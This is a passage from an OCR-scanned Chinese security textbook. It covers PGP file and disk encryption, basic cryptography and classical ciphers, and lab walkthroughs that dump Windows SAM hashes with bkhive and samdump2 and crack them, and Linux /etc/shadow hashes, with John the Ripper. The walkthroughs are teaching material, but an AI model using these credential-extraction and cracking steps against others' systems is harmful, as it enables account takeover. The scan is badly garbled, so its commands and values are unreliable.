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图 3-44 


“PGP 外 壳 一 输入 密码 ”对 话 框 (2) 


爱 上 对 方 收 到 风 防 节 烙 旦 法 


图 3-41 解密 后 的 内 容 
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图 3-45 PGP 自 解密 


在 任意 一 台 没 有 安装 PGP 软件 的 计算 机 上 双击 SDA_text. sda. exe 文件 ,如 图 3-45 所 
示 , 输 入 正确 的 密码 (用 户 ztguang 的 密码 ) 后 , 即 可 打开 文件 夹 ( 或 文件 )。 

6. 创建 PGPdisk 

PGPdisk 可 以 划分 出 一 部 分 的 磁盘 空间 来 存储 敏感 数据 。 这 部 分 磁盘 空间 用 于 创建 一 
个 称 为 PGPdisk 的 卷 。 虽 然 PGPdisk 卷 是 一 个 单独 的 文件 ,但 是 PGPdisk 卷 却 非常 像 一 个 
硬盘 分 区 ,用 来 提供 存储 文件 和 应 用 程序 。 

第 1 步 : 在 图 3-46 中 , 右 击 任务 栏 的 小 锁 按 钮 ,依次 选择 PGPdisk 一 “新 建 磁 盘 ” 命 令 ， 
出 现 *PGPdisk 创建 向 导 ” 对 话 框 ,如 图 3-47 所 示 。 图 中 文字 简单 介绍 了 PGPdisk 的 作用 。 


殉 迎 来 到 PGPdisk 创建 向 导 


[CR rd 


ED, SE OA, SCR ESO E (DERI. 


关于 cr 四 为 了 外 嫂 一 个 新 BoPcpdal 郑 SER RENA, 
许可 证 上 SB ETIEV Pad 65 BH MEUN VE 


be e. MEERA RENLAS DARIN TAEMOR. 


Wn, 请 点 击 "下 一 步 " 


图 3-46 右 击 小 锁 图 3-47 “PGPdisk 创建 向 导 ” 对 话 框 首页 


第 2 步 : 单 击 “ 下 一 步 ” 按 钮 ,出 现 *“PGPdisk 位 置 和 大 小 ”对 话 框 ,如 图 3-48 所 示 , 指 定 
要 存储 . pgd 文件 (这 个 . pgd 文件 在 以 后 被 装配 为 一 个 卷 , 也 可 理解 为 一 个 分 区 ,在 需要 时 
可 以 随时 装配 使 用 ) 的 位 置 和 容量 大 小 ,再 单 击 “ 高 级 选项 ”按钮 , 出现“ 选项” 对话 框 ,如 
图 3-49 所 示 。 
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图 3-48 "PGPdisk 位 置 和 大 小 ”对 话 框 图 3-49 “选项 ”对 话 框 


第 3 步 : 可 以 让 PGPdisk 以 一 个 分 区 形式 存在 ,或 者 在 NTFS 分 区 上 作为 一 个 目录 。 
加 密 算法 有 3 种 : AES(256bits)、CAST5(128bits) 和 Twofish(256bits)。 文 件 系统 格式 可 
以 作为 NTFS 或 FAT 装配 使 用 。 可 以 根据 需要 选中 “启动 时 装配 ” 复 选 框 。 单 击 “ 确 定 ” 按 
钮 返回 到 上 一 个 界面 。 

41 


| EMSEHSIUE 第 2 版 ) 


第 4 步 : 在 图 3-48 中 单 击 * 下 一 步 ?按钮 ,出现 * 选 择 一 个 保护 方法 ?对 话 框 ,如 图 3-50 
所 示 ,推荐 使 用 自己 的 公 钥 进行 加 密 保 护 ,选择 * 公 钥 ? 选 项 , 单 击 * 下 一 步 ? 按 钮 ,出 现 * 选 择 
一 个 公 钥 ?对话 框 ,如 图 3-51 所 示 。 

PGPdisk 创建 向 导 


JUPGPád E — 1 2ABGUP 请 从 下 面 的 列表 中 造反 一 个 


ze 有 效 性 。 大 小 
ETIEERTETIEED Y 2048/1024 


(m m) Coen (x 


图 3-50 “选择 一 个 保护 方法 ”对 话 框 图 3-51 “选择 一 个 公 钥 ”对 话 框 


第 5 步 : 在 图 3-51 中 ,列表 中 显示 出 已 经 建立 的 密 钥 信息 ,在 此 选择 ztguang 密 钥 , 单 
击 “ 下 一 步 ” 按 钮 ,出 现 “ 收 集 随机 数据 ”对 话 框 ,如 图 3-52 所 示 , 可 以 通过 鼠标 指针 移动 来 进 
行 随机 加 密 , 然 后 单 击 “ 下 一 步 ” 按 钮 , 出现“PGPdisk 创建 进程 "对话 框 ,如 图 3-53 所 示 。 
PGPdisk 为 所 指定 的 卷 进行 加 密 和 格式 化 操作 ,这 里 可 能 会 需要 一 段 时 间 ,可 以 根据 创建 卷 
的 大 小 而 定 。 


PGPdisk 创建 进程 
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图 3-52 “收集 随机 数据 ”对 话 框 图 3-53 “PGPdisk 创建 进程 "对话 框 


第 6 步 : 在 图 3-53 中 当前 状态 为 “完成 "时 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 完 成 PGPdisk 创 
建 向 导 ” 对 话 框 ,如 图 3-54 所 示 , 单 击 “ 确 定 ” 按 钮 ,完成 PGPdisk 的 创建 。 

7. 使 用 PGPdisk 

第 1 步 : 装配 PGPdisk 卷 。 在 图 3-55 中 右 击 “新 PGPdisk 卷 . pgd” 文 件 ,依次 选择 
PGP 一 “装配 PGPdisk” 命 令 , 出 现 “ 输 入 密码 ”对 话 框 ,如 图 3-56 所 示 , 单 击 “ 选 项 ”按钮 , 打 
开 “ 装 配 选 项 ”对 话 框 ,如 图 3-57 所 示 。 在 此 让 PGPdisk 以 一 个 分 区 (K: ) 形 式 存 在 , 单 击 
“确定 ”按钮 返回 到 上 一 个 界面 。 单 击 “ 确 定 ” 按 钮 后 ,PGPdisk 被 成 功 装配 ,如 图 3-58 所 示 。 
当 一 个 PGPdisk 卷 被 装配 上 去 后 ,可 以 将 它 作 为 一 个 单独 的 分 区 使 用 。 可 以 将 机 密 的 数据 
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都 存放 在 这 个 分 区 (PGPdisk 卷 ), 不 用 的 时 候 , 将 该 分 区 (PGPdisk 卷 ) 反 装配 ,需要 时 再 
装配 。 
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图 3-54 “完成 PGPdisk 创建 向 导 ” 对 话 框 图 3-55 ”装配 使 用 PGPdisk 
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图 3-56 “输入 密码 ”对话 框 (1) 图 3-57 “装配 选项 ”对 话 框 


第 2 步 : 反 装 配 PGPdisk 卷 。 在 图 3-58 中 右 击 “新 PGPdisk(K:)” 驱 动 器 ,依次 选择 
PGP--* J&t PGPdisk”, 即 可 将 该 卷 印 载 掉 。 当 卷 被 反 装 配 后 ,如 果 不 知道 密码 ,将 无 法 
访问 它 ,使 整个 卷 (存放 在 这 个 卷 的 数据 ) 得 到 保护 。 

也 可 以 在 图 3-59 中 单 击 * 反 装配 ?按钮 来 反 装 配 PGPdisk 卷 。 
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图 3-58 右 击 “ 新 PGPdisk(K:)” 图 3-59 “PGPdisk 编辑 器 ”对 话 框 


第 3 步 : 添加 用 户 。 如 果 PGPdisk 卷 不 希望 任何 人 可 以 轻易 使 用 ,这 就 要 针对 个 别 用 
户 进行 权限 分 配 。 
在 图 3-58 中 右 击 “新 PGPdisk 卷 . pgd” 文 件 , 依 次 选择 PGP 一 “编辑 PGPdisk” 命 令 , 出 
现 “PGPdisk 编辑 器 ?窗口 ,如 图 3-59 所 示 。 
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注意 : 添加 用 户 时 ,必须 对 PGPdisk 卷 进行 反 装 配 。 

在 图 3-59 中 单 击 “ 添 加 ”按钮 ,将 会 弹出 一 个 “输入 密码 ”对 话 框 ,如 图 3-60 所 示 。 输 入 
正确 密码 后 进入 “PGPdisk 用 户 创 建 向 导 ” 对 话 框 ,如 图 3-61 所 示 。 然 后 依次 按照 图 3-62 一 
图 3-64 的 提示 进行 操作 。 


图 3-60 “输入 密码 ”对 话 框 (2) 图 3-61 欢迎 界面 
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图 3-62 “选择 一 个 保护 方法 ”对 话 框 图 3-63 “选择 一 个 公 钥 ”对 话 框 


第 4 步 : 选择 允许 访问 的 用 户 。 在 图 3-64 中 单 击 “ 完 成 ”按钮 , 回 到 PGPdisk 管理 界 
面 ,在 这 里 可 以 通过 右键 快捷 菜单 对 用 户 进 行 “ 移 除 ”“ 禁 用 ”和 “固定 为 只 读 ” 等 操作 ,如 
图 3-65 所 示 。 
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图 3-64 “完成 PGPdisk 用 户 创建 向 导 ” 对 话 框 图 3-65 “PGPdisk 编辑 器 ”窗口 右键 菜单 


8. PGP 选项 

TF ilii 4 £4" PGP 选项 ”对 话 框 的 各 个 选项 卡 的 作用 .。 

CD “常规 ”选项 卡 如 图 3-66 所 示 。 各 选项 作用 如 下 。 

GD“ 选 项 * 选 项 区 : 常用 的 有 以 下 两 个 选项 。 

。 总 是 用 默认 的 密 钥 加 密 : 如 果 经 常 需要 传输 文件 ,需要 用 对 方 的 公 钥 进行 加 密 , 建 
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议 不 要 选择 此 项 。 

。 更 快 地 生成 密 钥 : 选择 该 选项 可 以 减少 在 创建 密 钥 时 所 用 的 时 间 。 

加 “ 单 点 登录 ?选项 区 : 有 的 时 候 频 繁 地 使 用 密 钥 来 进行 加 密 、 解 密 、 验 证 、 签 名 等 ,如 
果 每 次 都 这 样 重复 输入 ,将 显得 很 麻烦 ,这 时 可 以 使 用 密码 缓存 功能 ,在 短 时 间 内 不 用 重复 
输入 密码 了 。 

加 “文件 粉碎 ?选项 区 : 文件 粉碎 主要 针对 的 是 一 些 反 删除 软件 。 在 日 常 操作 中 的 “ 删 
除 ” 操 作 , 其 实 是 简单 意义 上 的 删除 ,数据 还 是 存在 的 ,一 些 反 删除 软件 可 以 对 其 进行 恢复 。 
而 PGP 里 提供 的 “文件 粉碎 ?功能 是 个 不 错 的 选择 , 它 对 文件 在 硬盘 的 存储 扇 区 进行 反复 写 
入 数据 ,让 一 些 反 删 除 软件 无 能 为 力 。 

注意 : 数据 履 写 次 数 越 多 ,需要 的 时 间 就 越 长 ,默认 次 数 (3 次 ) 一 般 可 以 满足 要 求 。 

(2)“ 文 件 ” 选 项 卡 如 图 3-67 所 示 。“PGP 密 钥 环 文件 ?备份 的 位 置 ,默认 在 系统 盘 的 
My Document 文件 夹 下 ,建议 对 其 进行 更 改 。 
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图 3-66 “常规 ”选项 卡 图 3-67 “文件 ”选项 卡 


(3)“ 邮 件 ” 选 项 卡 如 图 3-68 所 示 。 

CD 默认 签名 新 消息 : 选中 该 选项 ,可 以 在 对 方 装 有 PGP 的 环境 下 验证 邮件 的 有 效 性 ， 
确认 是 否 是 你 发 出 ,或 者 在 传输 过 程 中 被 第 三 方 自 改 。 

© 打开 信息 时 自动 解密 / 效 验 : 选中 此 项 将 会 更 快 更 方便 地 解密 / 效 验 邮件 。 

(4)“ 热 键 ?选项 卡 如 图 3-69 所 示 。 

(5)“ 服 务 器 ?选项 卡 如 图 3-70 所 示 。 

(6) CA 选项 卡 如 图 3-71 所 示 。 

(7)“ 高 级 ”选项 卡 如 图 3-72 所 示 。 建 议 选中 “在 PGPkeys 关闭 时 自动 密 钥 对 备份 ” 选 
项 。 建 议 不 要 选中 “自动 检查 更 新 ”选项 。 

(8) PGPdisk 选项 卡 如 图 3-73 所 示 。 

(D 允许 强制 反 装 配 PGPdisk 打开 的 文件 : 不 选中 此 项 时 ,如 果 PGPdisk 卷 中 有 打开 的 
文件 ,PGPdisk 卷 就 无 法 反 装配 。 选 中 此 项 ,将 强制 反 装 配 PGPdisk 卷 , 不 管 在 PGPdisk 卷 
中 是 否 有 打开 的 文件 。 
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图 3-68 “邮件 ”选项 卡 图 3-69 “ 热 键 ” 选 项 卡 
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图 3-70 “服务 器 ”选项 卡 图 3-71 CA 选项 卡 
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图 3-72 “高 级 ”选项 卡 图 3-73 PGPdisk 选项 卡 
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第 3 章 ”密码 技术 


© 自动 反 装 配 : 建议 选中 此 项 ,并 设 定 时 间 。 在 未 使 用 PGPdisk 卷 时 ,自动 对 其 进行 
反 装 配 。 但 是 如 果 PGPdisk 卷 中 有 打开 的 文件 .就 不 能 自动 进行 反 装配 了 。 


32 密码 技术 基础 


密码 学 是 研究 编制 密码 和 破译 密码 的 技术 科学 。 研 究 密码 变化 的 客观 规律 并 应 用 于 编 
制 密码 以 保守 通信 秘密 的 称 为 编码 学 ,应 用 于 破译 密码 以 获取 通信 情报 的 称 为 破译 学 ,两 者 


总 称 为 密码 学 。 
密码 学 是 在 编码 与 破译 的 TT RT EN E ERR 并 随 着 先进 科学 技术 的 应 
成 为 一 门 综合 性 的 尖端 技术 科学 。 它 与 语言 学 、 数 学、 电子 学 、 声 学 、 信 息 论 、 ipee s 


有 着 广泛 而 密切 的 联系 。 EAEI, 特别 是 各 国政 府 现 用 的 密码 编制 及 破译 手段 
都 具有 高 度 的 机 密 性 。 密 码 学 是 利用 文字 和 密码 的 规律 ,在 一 定 条 件 下 ,采取 各 种 技术 手 
段 ,通过 对 截取 密 文 的 分 析 , 以 求 得 明文 ,还 原 密码 编制 , 即 破译 密码 。 破 译 不 同 强度 的 密 
码 , 对 条 件 的 要 求 也 不 相同 。 

密码 破译 是 随 着 密码 的 使 用 而 逐步 产生 和 发 展 的 。1412 年 ,波斯 人 卡 勒 卡 尚 迪 所 编 的 
百科 全 书 中 载 有 破译 简单 代替 密码 的 方法 。 到 16 世纪 未 期 ,欧洲 一 些 国家 设 有 专职 的 破译 
AA ,以 破译 截获 的 密 信 。 密 码 破译 技术 有 了 相当 的 发 展 。1863 年 普鲁士 人 卡 西 斯 基 所 著 
《密码 和 破译 技术 》, 以 及 1883 年 法 国人 克 尔 克 霍 夫 所 著 ( 军 事 密码 学 ) 等 著作 ,都 对 密码 学 
的 理论 和 方法 做 过 一 些 论述 和 探讨 。1949 年 美国 人 香农 发 表 了 《秘密 体制 的 通信 理论 ) 一 
文 , 应 用 信息 论 的 原理 分 析 了 密码 学 中 的 一 些 基 本 问题 。 

1917 年 ,英国 破译 了 德国 外 长 齐 默 尔 曼 的 电报 ,促成 了 美国 对 德 宣战 。1942 年 ,美国 从 
破译 日 本 海军 密 报 中 ,获悉 日 军 对 中 途 岛 地 区 的 作战 意图 和 兵力 部 署 .从 而 以 劣势 兵力 击破 
日 本 海军 的 主力 ,扭转 了 太平 洋 地 区 的 战局 。 这 些 事例 也 从 反面 说 明了 密码 保密 的 重要 性 。 

如 今 许多 国家 都 十 分 重视 密码 工作 ,设立 相关 机 构 . 拨 出 巨额 经 费 ,集中 专家 和 科技 人 
员 , 投 入 大 量 高 速 的 电子 计算 机 和 其 他 先进 设备 进行 工作 。 各 民间 企业 和 学 术 界 也 对 密码 
日 益 重 视 , 不 少数 学 家 ,计算 机 学 家 和 其 他 有 关 学 科 的 专家 也 投身 于 密码 学 的 研究 行列 ,更 
加 速 了 密码 学 的 发 展 。 

总 之 ,计算 机 安全 主要 包括 系统 安全 和 数据 安全 两 个 方面 。 而 数据 安全 则 主要 采用 现 
代 密 码 技术 对 数据 进行 安全 保护 ,如 数据 保密 数据 完整 性 、 身 份 认证 等 技术 。 密 码 技 术 包 
括 密码 算法 设计 、 密 码 分 析 、 安 全 协议 .身份 认证 、 消 息 确认 、 数 字 签名 、 密 钥 管理 、 密 钥 托管 
等 技术 ,是 保护 大 型 网 络 安全 传输 信息 的 唯一 有 效 手段 ,是 保障 信息 安全 的 核心 技术 。 密 码 
技术 以 很 小 的 代价 ,对 信息 提供 一 种 强 有 力 的 安全 保护 。 

3.2.1 明文 . 密 文 .算法 和 密 角 

密码 是 通信 双方 按 约 定 的 法 则 进行 信息 特殊 变换 的 一 种 重要 保密 手段 。 依 照 这 些 法 
则 , 变 明文 为 密 文 , 称 为 加 密 变 换 ; 变 密 文 为 明文 , 称 为 脱 密 变 换 。 密 码 在 早期 仅 对 文字 或 
数码 进行 加 、 脱 密 变换 , 随 着 通信 技术 的 发 展 .对 语音 、 图 像 .数据 等 都 可 实施 加 、 脱 密 变换 。 

。 明文 (plaintext) ; 能 够 被 人 们 直接 阅读 的 、 需 要 被 隐蔽 的 文字 。 
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* "iX CipertexO : 不 能 够 被 人 们 直接 阅读 的 。 

* 加 密 (Cencryption) : 用 某 种 方法 将 文字 转换 成 不 能 直接 阅读 的 形式 的 过 程 。 加 密 一 
般 分 为 3 类, 即 对 称 加 密 , 非 对 称 加 密 以 及 单 向 散 列 函数 。 

* fe (decryption): 把 密 文 转变 为 明文 的 过 程 。 明 文 用 M 表示 , 密 文 用 C 表示 ,加 密 
PRAE TERI T M. 得 到 密 文 C ,用 数学 表示 如 下 : 


EM) =C 
相反 的 ,解密 函数 D 作用 于 C 产生 M: 
D(C) = M 


。 密 钥 : 是 用 来 对 数据 进行 编码 和 解码 的 一 串 字 符 。 

* 加 密 算法 : 在 加 密 密 钥 的 控制 下 对 明文 进行 加 密 的 一 组 数学 变换 。 

t 解密 算法 : 在 解密 密 钥 的 控制 下 对 密 文 进行 解密 的 一 组 数学 变换 。 

现代 加 密 算法 的 安全 性 基于 密 钥 的 安全 性 ,算法 是 公开 的 ,可 以 被 所 有 人 分 析 , 只 要 保 
证 密 钥 不 被 人 知道 ,就 可 保证 信息 的 安全 。 


3.2.2 密码 体制 


密码 学 包括 密码 设计 与 密码 分 析 两 个 方面 ,密码 设计 主要 研究 加 密 方法 ,密码 分 析 主 要 
针对 密码 破译 , 即 如 何 从 密 文 推演 出 明文 . 密 钥 或 解密 算法 的 学 问 。 

从 密码 学 的 发 展 历程 来 看 , 共 经 历 了 古典 密码 、 对 称 密 钥 密 码 ( 单 钥 密 码 体 制 )、 公 开 密 
钥 密码 ( 双 钥 密码 体制 ) 三 个 发 展 阶段 。 古 典 密码 是 基于 字符 替换 的 密码 ,现在 已 经 很 少 使 
用 ,但 它 代 表 了 密码 的 起 源 。 

基于 密 钥 的 算法 按 密 钥 管理 的 方式 可 以 分 为 对 称 算 法 与 非 对 称 算 法 两 大 类 , 即 我 们 通 
常 所 说 的 对 称 密 钥 密码 体制 和 非 对 称 密 钥 密 码 体 制 。 相 应 地 ,对 数据 加 密 技 术 分 为 对 称 加 
密 ( 私 人 密 钥 加 密 ) 和 非 对 称 加 密 ( 公 开 密 钥 加 密 ) 。 

密码 体制 从 原理 上 可 分 为 两 大 类 , 即 单 钥 密码 体制 (对 称 性 加 密 ) 和 双 钥 密码 体制 ( 非 对 
称 性 加 密 )。 单 钥 体制 的 加 密 密 钥 和 解密 密 钥 相同 。 采 用 单 钥 体 制 的 系统 的 保密 性 主要 取 
决 于 密 钥 的 保密 性 ,与 算法 的 保密 性 无 关 , 即 由 密 文 和 加 解密 算法 不 可 能 得 到 明文 。 换 句 话 
说 ,算法 无 须 保 密 , 需 保密 的 仅 是 密 钥 。 根 据 单 钥 密码 体制 的 这 种 特性 , 单 钥 加 .解密 算法 可 
通过 低 费 用 的 芯片 来 实现 。 公 钥 密 码 体制 要 求 密 钥 成 对 使 用 。 每 个 用 户 都 有 一 对 选 定 的 密 
钥 ,一 个 可 以 公开 , 即 公共 密 钥 。 一 个 由 用 户 安全 拥有 , 即 秘密 密 钥 。 公 共 密 钥 和 秘密 密 铀 
之 间 有 密切 的 关系 。 

密码 学 术 研 究 历史 如 下 : 

1949 年 Shannon 发 表 论文 “保密 通信 的 信息 理论 ”, 使 密码 研究 成 为 学 术 研 究 ; 

1976 年 W. Diffie 和 M. E. Hellman 发 表 论文 “密码 学 的 新 方向 ,提出 公 钥 思想 ; 

1977 年 美国 国家 标准 局 正式 公布 实施 DES, 成 为 密码 技术 商用 典范 ; 

1978 年 RSA 公 钥 算法 提出 (R. L. RivestA. ShamirL. Adleman) ,成 为 公 钥 算 法 经 典 ; 

1981 年 国际 密码 研究 学 会 (International Association for CryptologicResearch,IACR) 
成 立 ; 

2001 年 AES 被 选 定 。 
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3.2.3 古典 密码 学 


古典 密码 有 着 悠久 的 历史 ,从 古代 一 直到 计算 机 出 现 以 前 ,古典 密码 学 主要 有 两 大 基本 
方法 。 

CO 代替 密码 。 就 是 将 明文 的 字符 替换 为 密 文 中 的 另 一 种 的 字符 ,接收 者 只 要 对 密 文 
做 反 向 替换 就 可 以 恢复 出 明文 。 简 而 言 之 , 它 是 将 明文 中 的 字母 用 其 他 字母 (或 数字 、 符 号 ) 
代替 的 加 密 技 术 。 改 变 明文 内 容 的 表示 形式 ,保持 内 容 元 素 之 间 相 对 位 置 不 变 。 

(2) 易 位 密码 。 明 文 的 字母 保持 相同 ,但 顺序 被 打 乱 。 如 果 明 文 仅仅 通过 移动 它 的 元 
素 的 位 置 而 得 到 密 文 ,我们 把 这 种 加 密 方 法 称 为 置换 技术 。 改 变 明文 内 容 元 素 的 相对 位 置 ， 
保持 内 容 的 表现 形式 不 变 。 

1. 代替 密码 举例 一 一 恺 撒 密 码 

已 撤 (Caesar) 密 码 是 对 英文 26 个 字母 进行 移 位 代替 的 密码 ,如 图 3-74 所 示 。 古 罗马 
恺 撤 大 帝 ( 公 元 前 101 一 公元 前 44 年 ) 提 出 的 替换 加 密 方 法 有 内 外 两 个 圆 盘 ,转动 外 盘 一 定 
角度 , 即 密 钥 。 

加 密 过 程 : 密 钥 为 3, 即 顺 时 针 旋 转 外 盘 , 明 文 为 test( 内 盘 字 母 ), 用 外 盘 对 应 的 字母 代 
替 , 得 密 文 为 qbpq。 

解密 过 程 : 需要 知道 密 钥 为 3, 然 后 顺 时 针 旋 转 外 盘 , 密 文 为 qbpq( 外 盘 字 母 ), 用 内 盘 
对 应 的 字母 代替 ,明文 为 test。 

2. 易 位 密码 举例 矩阵 转 置 

具体 如 图 3-75 所 示 。 

明文 : do you know(Cdoyouknow) 。 

密 文 : donouoykw。 


输入 
d o y 
E] 
出 o u k 
n o w 
图 3-74 旋转 外 盘 3-75 和 抢 阵 转 置 


33 用 户 密码 的 破解 


3.3.1 实例 : 破解 Windows 用 户 密码 
删除 Windows 登录 密码 的 一 种 简单 的 方法 是 使 用 Windows 安装 盘 ( 启 动 界面 中 应 该 
包含 删除 Windows 登录 密码 之 类 的 选项 ) 。 
49 


下 面 介 绍 破 解 Windows 登录 密码 的 方法 。 

操作 系统 为 : Redhat/CentOS/Fedora。 

到 网 站 下 载 john-1. 7. 2. tar. gz, bkhive-1. 1. 1. tar. gz 和 samdump2-1. 1. 1. tar. gz。 将 
这 3 个 文件 放 在 Linux 桌面 上 。 将 Windows 系统 C:\windows\system32\config\ 中 的 两 个 
文件 sam 和 system 复制 到 Linux 桌面 上 。 

然后 在 终端 窗口 执行 如 下 命令 。 

1. 解压 缩 bkhive-1. 1. 1. tar. gz 


[root(2localhost Desktop]# tar zxvf bkhive 一 1.1.1.tar.gz 
[root(2localhost Desktop]# cd bkhive- 1.1.1 


2. 编译 bkhive 

[root()localhost bkhive- 1.1.1] # make 

用 bkhive 命令 从 system 文件 生成 一 个 system. txt XF: 
[root(2localhost bkhive- 1.1.1] # ./bkhive ../system . . /system.txt 
3. 解压 缩 samdump2-1. 1. 1. tar. gz 


[root(2localhost Desktop]it tar zxvf samdump2 - 1. 1. 1. tar. gz 
[root@ localhost Desktop] # cd samdump2 - 1.1.1 


4. 编译 samdump2 
[root(2localhost samdump2 — 1.1.1] # make 


5. 提取 账号 信息 
用 samdump2 命令 从 system. txt 文件 和 sam 文件 生成 一 个 passwd_hashes. txt 文件 ， 
passwd hashes. txt 文件 的 内 容 是 最 终 要 被 破解 的 用 户 账号 信息 。 


[root@ localhost samdump2—1.1.1]# ./samdump2 ../sam ../system.txt > ../passwd hashes. txt 


passwd hashes. txt 文件 的 内 容 如 图 3-76 所 示 。 


administrator :1003:3123ace83f459a5faad3b435b51404ee :7c67782fbbd7b75ef92ed9cf9114e2f4: : 
ztguang:1004:dlcaaf88ec854982aad3b435b51404ee : 46316975352144£32e9887c57ba781e1::: 


图 3-76  passwd hashes. txt 文件 的 内 容 


6. 使 用 john 破解 Windows 用 户 密码 


[root(2localhost samdump2 — 1.1.1] # cd.. 
[root(2localhost Desktop] it cd john- 1.7.2/run 
[root(2localhost run] # ./john-- incremental:Alpha ../../passwd hashes.txt 


在 图 3-77 中 ,使 用 第 四 行 的 命令 对 passwd | hashes. txt 文件 进行 解密 ,两 秒 钟 就 将 
Administrator 和 ztguang 用 户 的 密码 破解 出 来 了 。 
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"x eel 


件 进 行 解密 ,给 出 了 No password hashes loaded 的 提示 . Jii 


L——————— L, 
文件 (编辑 (E) MEV SAOD 标签 (8) MOH 

[rootelocalhost run]# ./john 一 incremental:Alpha . ./. ./ passwd. hashes. txt QË 
Loaded 2 password hashes with no different salts (IM DES [22722 BS] T 
Warning: MaxLen = 8 is too large for the current hash type, reduced to 7 
ASDFG (ztg) 

QWERT (Adninistor) 

guesses: 2 time: 0:00:00:29 c/s: 2620K trying: QWENK — QWERB 
[rootelocalhost run]# ./john —incremental:Alpha ../../passwd hashes.txt(2) 
No password hashes loaded 


[rootelocalhost run]f rm john.pot G) 
rm: 是 否 删除 一 般 文件 john.pot ? y 


[rootelocalhost run]# ./john —incremental:Alpha ../../passwd hashes.txt(4) 
Loaded 2 password hashes with no different salts (LM DES [32/32 BS 


Warning: MaxLen = 8 is too large for the current hash type, reduced to 7 


ASDFG (tg) 
QWERT (Administor) 


Euesses: 2 time: 0:00:00:30 c/s: 2079K trying: QWENK — QWERB F 
[rootelocalhost run]# J t 


3-77 ”使 用 john 破解 Windows 用 户 密码 


第 @ 行 再 次 执行 前 面 的 命令 ,对 passwd_hashes. txt X 


XO SRO m) MNT iQ) MWH 
[rootelocalhost run]# cat john.pot| 


因 在 于 已 经 被 破解 的 密码 会 被 保存 在 john. pot cfr iE [scartelaeabsoarerAsDro 


SLM$5422a4cdb0f1c794:QWERT 


样 避免 了 重复 性 的 工作 ,john. pot 文件 的 内 容 如 图 3-78 所 [Leootetocathost run] B 
示 。 执 行 第 @ 行 的 命令 将 john. pot 文件 删除 ,再 次 执行 第 图 3-78 被 破解 的 密码 
@ 行 的 命令 ,结果 如 图 3-76 所 示 。 


3.3.2 实例 : 破解 Linux 用 户 密码 


1. 添加 Linux FP 
[root(2localhost ~] # useradd Root 
[root(2localhost ~] # passwd Root 
Changing password for user Root. 

新 的 UNIX 口令 : 

[root@1localhost ~] # useradd admin 
[root(2localhost 一 ]# passwd admin 


Changing password for user admin. 
新 的 UNIX 口令 : 


2. 获得 密码 信息 
将 如 下 两 行 信息 (位 于 /etc/shadow 文件 中 ) 存 入 /root/Desktop/shadow 文件 。 


Root: $ 1 $ KS9tKmJM $ 1TUKsZn79hGMLn7n0BUVx/ :13850:0:99999:7::: 
admin: $ 1$ suByWt6T $ 1Ug3r5ZClo. 6mNd£XkQr//:13850:0:99999:7::: 


3. 改变 文件 /root/Desktop/shadow 权限 .只 允许 管理 员 访 问 该 文件 


[root@ localhost Desktop] chmod 700 shadow 


4. 使 用 john 破解 Linux 用 户 密码 
下 面 使 用 密码 词典 来 破解 Linux 用 户 密码 。password. Ist 文件 是 密码 词典 ,包含 可 能 
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的 用 户 密 码 ,执行 如 图 3-79 所 示 的 命令 (. /john--w:password. Ist ../../shadow), 从 结果 
可 知 没 有 破解 成 功 , 原 因 在 于 密码 词典 不 够 大 。 


root@localhost:~/Desktop/john-1.7.2/run 


[rootelocalhost run]# ./john —w:password.lst ../../shadow 


x 
[a 
O 
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32]) E 
guesses: 0 time: 0:00:00:02 100% c/s: 2667 trying: zhongguo lc 


图 3-79 破解 失败 


扩充 password. lst 文件 ,添加 更 多 可 能 的 用 户 密 码 , 执 行 如 图 3-80 所 示 的 命令 
C. /john--w:password. lst . . /. . /shadow) ,从 结果 可 知 破 解 成 功 。 由 此 可 知 , 用 此 种 方法 
时 ,关键 要 有 大 的 密码 词典 。 不 过 密码 词典 越 大 ,破解 时 用 的 时 间 越 长 。 


[rootelocalhost run]# ./john —w:password.lst ../../shadow 
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32]) 


catdog (admin) [ 用户 admin (cH Zicatdog 
oodver (Root) 
guesses: 2 time: 0:00:00: 


图 3-80 ”破解 成 功 
破解 成 功 后 john. pot 文件 的 内 容 如 下 所 示 : 
$ 1 $ suByWt6T $ 1Ug3r5ZC10. 6nNd£XkQr// :catdog 
$ 1 $ KS9tKnJM $ 1TUKsZn79hGMLn7n0BUVx/ : goodvery 
3.3.3 密码 破解 工具 John the Ripper 


1. John the Ripper 简介 

John the Ripper 是 用 于 在 已 知 密 文 的 情况 下 尝试 破解 出 明文 的 破解 密码 工具 软件 , 主 
要 支持 对 DES、MD5 两 种 加 密 方式 的 密 文 进行 破解 , 它 可 以 运行 在 多 种 不 同 的 机 型 以 及 多 
种 不 同 的 操作 系统 之 下 。 该 软件 的 下 载 网 址 为 http://www. openwall. com/john/。 

2. 语法 

命令 行 语法 格式 : 


john [ - 选项 ] [密码 文件 名 ] 
常用 选项 及 其 功能 说 明 见 表 3-1。 
表 3-1 john 选项 及 其 功能 说 明 


选 项 功 能 
--single 使 用 Single Crack 模式 进行 解密 
--wordlist— FILE --stdin 使 用 密码 字典 的 破解 模式 
--rules 规则 式 密码 字典 破解 模式 
--incremental[ = MODE] 增强 模式 
--external= MODE 外 部 破解 模式 
--restore[ = NAME] 继续 上 一 次 中 断 的 破解 工作 
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d 
xk 项 功 能 
--show 显示 已 经 破解 的 密码 
--test 用 来 测试 所 用 计算 机 的 破解 速度 
--users=[-JLOGIN| UIDL,...] 只 破解 指定 用 户 或 属于 每 个 组 的 用 户 


È: 所 有 的 选项 均 对 大 小 写 不 敏感 ,而 且 也 不 需要 全 部 输入 ,只 要 在 保证 不 与 其 他 参数 冲突 的 前 提 下 输入 即 可 ， 
如 --incremental 参数 只 要 输入 --i 即 可 。 


3. 破解 模式 
破解 模式 如 表 3-2 所 示 。 

表 3-2 破解 模式 
破解 模式 说 明 


单一 破解 模式 ,根据 用 户 名 猜测 其 可 能 的 密码 ,需要 人 为 定义 相应 的 模式 内 容 。 其 
Single Crack 模式 | 模式 的 定义 在 john. conf 文件 (Windows 中 是 john. ini 文件 ) 中 的 [List. Rules: 
Single] 部 分 

这 是 最 简单 的 破解 模式 ,只 需 指定 一 个 密码 词典 文件 ,然后 使 用 规则 化 的 方式 让 这 
密码 词典 模式 些 规则 自动 地 作用 在 每 个 从 密码 词典 文件 中 读 入 的 单词 上 。 规 则 化 的 方式 是 用 来 
修正 每 个 读 入 的 单词 

这 是 功能 最 强大 的 破解 模式 ,尝试 将 所 有 可 能 的 字符 组 合作 为 密码 。 要 使 用 这 个 
